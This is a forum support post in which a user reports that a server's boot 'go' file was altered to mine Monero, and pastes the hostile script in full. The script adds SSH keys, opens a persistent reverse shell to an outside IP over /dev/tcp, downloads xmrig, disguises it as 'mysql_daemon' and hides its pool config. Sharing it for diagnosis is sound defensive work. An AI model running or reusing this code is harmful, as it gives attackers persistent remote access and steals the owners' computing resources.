Jump to content

JackDewhurst

Members
 View Profile  See their activity

  • Posts

    5

  • Joined

  • Last visited

 Content Type 

Posts posted by JackDewhurst

    100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto

    in General Support

    Posted

    On 2/5/2021 at 3:03 PM, trurl said:

    And the few plugins you have I don't think use that so I don't know why it would still be running.

     

    Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below:
     

      

    #!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{
    "autosave": true,
    "background": true,
    "cpu": {
        "enabled": true,
        "max-threads-hint": 50
    },
    "max-cpu-usage": 25,
    "cpu-priority": 1,
    "opencl": false,
    "cuda": false,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
            "keepalive": true,
            "tls": true
        }
    ]
}' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz

     

    Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..

     

×
×
  • Create New...